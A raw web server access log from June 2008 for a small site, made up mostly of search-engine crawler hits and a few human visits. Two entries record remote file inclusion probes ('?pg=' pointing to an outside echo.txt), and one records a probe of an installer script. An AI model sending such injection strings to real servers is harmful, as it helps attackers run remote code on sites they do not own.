66.249.66.4 - - [02/Jun/2008:15:17:58 +0200] "GET /framez-search.html HTTP/1.1" 200 4326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.52.82 - - [02/Jun/2008:15:22:12 +0200] "GET /logs/usage_200711.html HTTP/1.0" 200 109628 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.92 - - [02/Jun/2008:15:34:41 +0200] "GET /zampa-lovers/ HTTP/1.0" 200 37790 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.92 - - [02/Jun/2008:15:34:51 +0200] "GET /zampa/montenegro/ HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [02/Jun/2008:15:36:12 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.54.48 - - [02/Jun/2008:15:51:11 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.236 - - [02/Jun/2008:16:00:57 +0200] "GET /zampa-lovers/ZAMPAMA2.MPG HTTP/1.0" 200 63492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.160 - - [02/Jun/2008:16:12:29 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [02/Jun/2008:16:12:29 +0200] "GET /framez-rez.html HTTP/1.1" 200 4323 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [02/Jun/2008:16:14:16 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [02/Jun/2008:16:14:16 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [02/Jun/2008:16:14:16 +0200] "GET /f-rez.html HTTP/1.1" 200 9765 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [02/Jun/2008:16:14:17 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.163 - - [02/Jun/2008:16:16:45 +0200] "GET /f-maintitle.html HTTP/1.1" 200 5030 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.119.195.63 - - [02/Jun/2008:16:29:24 +0200] "GET /?pg=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 10127 "-" "libwww-perl/5.803"
81.31.148.15 - - [02/Jun/2008:16:33:35 +0200] "GET /?pg=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 10127 "-" "libwww-perl/5.79"
124.115.4.212 - - [02/Jun/2008:16:55:44 +0200] "GET / HTTP/1.1" 200 10127 "http://www.various-euro.com/" "Mozilla/4.0 (compatible; MSIE 6.0)"
67.195.37.109 - - [02/Jun/2008:17:15:25 +0200] "GET /f-web.html HTTP/1.0" 200 13605 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.52.143.15 - - [02/Jun/2008:17:20:34 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.15 - - [02/Jun/2008:17:20:36 +0200] "GET /warez.html HTTP/1.1" 200 9754 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
74.6.8.121 - - [02/Jun/2008:17:28:23 +0200] "GET /logs/usage_200712.html HTTP/1.0" 200 92577 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.24.245 - - [02/Jun/2008:17:41:58 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.61 - - [02/Jun/2008:17:41:59 +0200] "GET /f-doku-brau.html HTTP/1.0" 200 7152 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.184 - - [02/Jun/2008:17:43:41 +0200] "GET /bmpp/euro_pal_1.html HTTP/1.0" 200 18252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.0.249.70 - - [02/Jun/2008:17:53:52 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
66.249.66.4 - - [02/Jun/2008:17:59:07 +0200] "GET /framez.html HTTP/1.1" 200 3883 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.37.109 - - [02/Jun/2008:18:35:29 +0200] "GET /framez.html HTTP/1.0" 200 3883 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [02/Jun/2008:18:35:31 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [02/Jun/2008:18:35:31 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [02/Jun/2008:18:35:31 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.164 - - [02/Jun/2008:18:39:26 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.164 - - [02/Jun/2008:18:39:26 +0200] "GET / HTTP/1.1" 200 10127 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.8.121 - - [02/Jun/2008:18:40:52 +0200] "GET /f-contact.html HTTP/1.0" 200 6804 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.163 - - [02/Jun/2008:18:41:42 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.8.121 - - [02/Jun/2008:18:47:46 +0200] "GET /zampa/montenegro/contributions.html HTTP/1.0" 200 18843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.231.189.44 - - [02/Jun/2008:18:48:36 +0200] "GET /robots.txt HTTP/1.0" 302 363 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
66.231.189.139 - - [02/Jun/2008:18:48:36 +0200] "GET / HTTP/1.0" 302 353 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
66.249.66.4 - - [02/Jun/2008:18:56:54 +0200] "GET /neon/warning.html HTTP/1.1" 200 5134 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.212.216 - - [02/Jun/2008:19:04:13 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [02/Jun/2008:19:04:13 +0200] "GET / HTTP/1.0" 200 10127 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.24.245 - - [02/Jun/2008:19:09:49 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.30 - - [02/Jun/2008:19:09:50 +0200] "GET /logs/usage_200705.html HTTP/1.0" 200 109447 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.19.167 - - [02/Jun/2008:19:29:14 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "-"
74.6.17.111 - - [02/Jun/2008:19:51:04 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.230 - - [02/Jun/2008:19:51:04 +0200] "GET /neon/euro.html HTTP/1.0" 200 2212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.212.130.138 - - [02/Jun/2008:20:03:25 +0200] "GET / HTTP/1.1" 302 353 "http://www.google.si/search?client=firefox-a&rls=org.mozilla%3Asl%3Aofficial&channel=s&hl=sl&q=zampa+di+leone&meta=&btnG=Iskanje+Google" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:03:25 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://www.google.si/search?client=firefox-a&rls=org.mozilla%3Asl%3Aofficial&channel=s&hl=sl&q=zampa+di+leone&meta=&btnG=Iskanje+Google" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:03:25 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:03:25 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:03:25 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:03:25 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.249.66.4 - - [02/Jun/2008:20:03:48 +0200] "GET /f-maintitle.html HTTP/1.1" 200 5030 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.212.130.138 - - [02/Jun/2008:20:04:41 +0200] "GET /zampa/slike/S1TITEL.GIF HTTP/1.1" 200 15244 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:04:49 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:04:51 +0200] "GET /zampa/slike/S2COPY.GIF HTTP/1.1" 200 12771 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:04:55 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:04:57 +0200] "GET /zampa/slike/E3VAMPIR.GIF HTTP/1.1" 200 52553 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:05:11 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:05:13 +0200] "GET /zampa/slike/E4IRWIN.GIF HTTP/1.1" 200 53174 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:05:56 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
89.212.130.138 - - [02/Jun/2008:20:05:58 +0200] "GET /zampa/slike/E7MEDIAA.GIF HTTP/1.1" 200 44716 "http://www.various-euro.com/zampa/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sl; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.231.188.24 - - [02/Jun/2008:20:15:09 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
74.6.8.121 - - [02/Jun/2008:20:17:07 +0200] "GET /zampa/montenegro/index.html HTTP/1.0" 200 2651 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [02/Jun/2008:20:37:15 +0200] "GET /DgH/ HTTP/1.0" 200 5024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.81.36.130 - - [02/Jun/2008:20:37:49 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [02/Jun/2008:20:37:50 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [02/Jun/2008:20:37:51 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [02/Jun/2008:20:37:50 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
66.249.66.4 - - [02/Jun/2008:20:43:20 +0200] "GET /f-zeug.html HTTP/1.1" 200 45338 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.8.121 - - [02/Jun/2008:20:56:09 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [02/Jun/2008:20:56:09 +0200] "GET /rez/557.mp3 HTTP/1.0" 200 9164800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [02/Jun/2008:20:59:15 +0200] "GET /f-warez.html HTTP/1.0" 200 10953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [02/Jun/2008:21:07:33 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [02/Jun/2008:21:07:33 +0200] "GET /sendi-agent/Interfiction-sendi.mpg HTTP/1.0" 200 13300252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [02/Jun/2008:21:09:38 +0200] "GET /world.html HTTP/1.0" 200 16295 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [02/Jun/2008:21:19:43 +0200] "GET /neon/girlz3.html HTTP/1.1" 200 2479 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.52.31 - - [02/Jun/2008:21:34:17 +0200] "GET /framez-girlz.html HTTP/1.0" 200 4271 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.31 - - [02/Jun/2008:21:34:27 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.31 - - [02/Jun/2008:21:34:37 +0200] "GET /neon/girlz2.html HTTP/1.0" 200 2937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.31 - - [02/Jun/2008:21:34:47 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.193.200 - - [02/Jun/2008:21:36:05 +0200] "GET /rez/326.mp3 HTTP/1.0" 200 7672484 "http://202.108.23.172/index.html" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)"
124.115.4.212 - - [02/Jun/2008:21:39:28 +0200] "GET / HTTP/1.1" 200 10127 "http://www.various-euro.com/" "Mozilla/4.0 (compatible; MSIE 6.0)"
74.6.8.121 - - [02/Jun/2008:21:42:34 +0200] "GET /f-search.html HTTP/1.0" 200 11800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.210.237.99 - - [02/Jun/2008:22:05:02 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.210.237.99 - - [02/Jun/2008:22:05:02 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "http://us.f353.mail.yahoo.com/ym/blocksender2?box=Inbox&MsgId=9180_61574258_3369605_1969_921_0_33366_1686_2127986815&inc=&Search=&YY=11436&y5beta=yes&y5beta=yes&order=down&sort=date&pos=0&view=a&head=b" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.210.237.99 - - [02/Jun/2008:22:05:02 +0200] "GET /zampa/slike/zampa.gif HTTP/1.1" 200 5310 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.210.237.99 - - [02/Jun/2008:22:05:02 +0200] "GET /zampa/slike/udupetu.gif HTTP/1.1" 200 4138 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.210.237.99 - - [02/Jun/2008:22:05:03 +0200] "GET /zampa/slike/inthearse.gif HTTP/1.1" 200 4077 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.210.237.99 - - [02/Jun/2008:22:05:19 +0200] "GET /zampa/slike/E1TITEL.GIF HTTP/1.1" 200 16284 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.210.237.99 - - [02/Jun/2008:22:05:25 +0200] "GET /zampa/slike/E2COPY.GIF HTTP/1.1" 200 10416 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
195.210.237.99 - - [02/Jun/2008:22:05:33 +0200] "GET /zampa/slike/E3VAMPIR.GIF HTTP/1.1" 200 52553 "http://www.various-euro.com/zampa/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
193.252.149.15 - - [02/Jun/2008:22:06:19 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.15 - - [02/Jun/2008:22:06:21 +0200] "GET /neon/click.html HTTP/1.1" 200 521 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
220.181.19.167 - - [02/Jun/2008:22:10:34 +0200] "GET / HTTP/1.1" 302 353 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
220.181.19.167 - - [02/Jun/2008:22:10:46 +0200] "GET /robots.txt HTTP/1.1" 304 - "-" "-"
66.249.66.4 - - [02/Jun/2008:22:25:36 +0200] "GET /framez-zeug.html HTTP/1.1" 200 4311 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.17.111 - - [02/Jun/2008:22:26:08 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.47 - - [02/Jun/2008:22:26:08 +0200] "GET /neon/code.html HTTP/1.0" 200 1109 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.47.80.147 - - [02/Jun/2008:22:36:43 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)"
193.47.80.147 - - [02/Jun/2008:22:36:43 +0200] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)"
193.47.80.147 - - [02/Jun/2008:22:36:43 +0200] "GET /montenegro/slike/plakat.jpg HTTP/1.1" 302 380 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)"
193.47.80.147 - - [02/Jun/2008:22:36:44 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)"
193.47.80.147 - - [02/Jun/2008:22:36:44 +0200] "GET /zampa/montenegro/slike/plakat.jpg HTTP/1.1" 200 47879 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)"
64.92.161.138 - - [02/Jun/2008:23:40:26 +0200] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "-" "Royiq tolcakrf qymfv"
74.6.18.33 - - [02/Jun/2008:23:59:30 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.86 - - [02/Jun/2008:23:59:31 +0200] "GET /schubb/schubb-4.html HTTP/1.0" 200 17746 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.38 - - [03/Jun/2008:00:01:10 +0200] "GET /schubb/schubb-5.html HTTP/1.0" 200 72944 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [03/Jun/2008:00:04:19 +0200] "GET /triple-double-u/robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.99.30.66 - - [03/Jun/2008:00:18:06 +0200] "GET /neon/imeurope.GIF HTTP/1.0" 200 9365 "http://www.munax.com/referer.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
88.244.12.164 - - [03/Jun/2008:00:20:24 +0200] "GET /neon/girl-tv.html HTTP/1.1" 200 1717 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
194.72.9.25 - - [03/Jun/2008:00:26:25 +0200] "GET /ct/installct.php?action=proc HTTP/1.1" 404 2748 "http://various-euro.com/ct/installct.php?action=proc" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.8.121 - - [03/Jun/2008:00:31:36 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.81.36.130 - - [03/Jun/2008:00:33:24 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [03/Jun/2008:00:33:25 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [03/Jun/2008:00:33:25 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.8.121 - - [03/Jun/2008:00:46:42 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:00:51:54 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.99.30.72 - - [03/Jun/2008:00:57:04 +0200] "GET /bannerz/warning.gif HTTP/1.0" 200 3352 "http://www.munax.com/referer.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
82.99.30.72 - - [03/Jun/2008:00:57:04 +0200] "GET /bannerz/moneys.gif HTTP/1.0" 200 13192 "http://www.munax.com/referer.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
119.63.194.61 - - [03/Jun/2008:01:00:37 +0200] "GET / HTTP/1.1" 200 10127 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)"
65.55.211.161 - - [03/Jun/2008:01:05:12 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.161 - - [03/Jun/2008:01:05:12 +0200] "GET /neon/warning2.html HTTP/1.1" 200 997 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
202.179.180.45 - - [03/Jun/2008:01:15:01 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
202.179.180.45 - - [03/Jun/2008:01:15:01 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)"
74.6.8.121 - - [03/Jun/2008:01:33:41 +0200] "GET /f-other.html HTTP/1.0" 200 33189 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:01:54:34 +0200] "GET /sendi_agent.html HTTP/1.0" 200 6213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.151 - - [03/Jun/2008:01:58:37 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.151 - - [03/Jun/2008:01:58:39 +0200] "GET /neon/girlz2.html HTTP/1.1" 200 2937 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.169 - - [03/Jun/2008:02:02:18 +0200] "GET /DgH/ HTTP/1.1" 200 5024 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.30.216.100 - - [03/Jun/2008:02:17:07 +0200] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.100 - - [03/Jun/2008:02:17:08 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
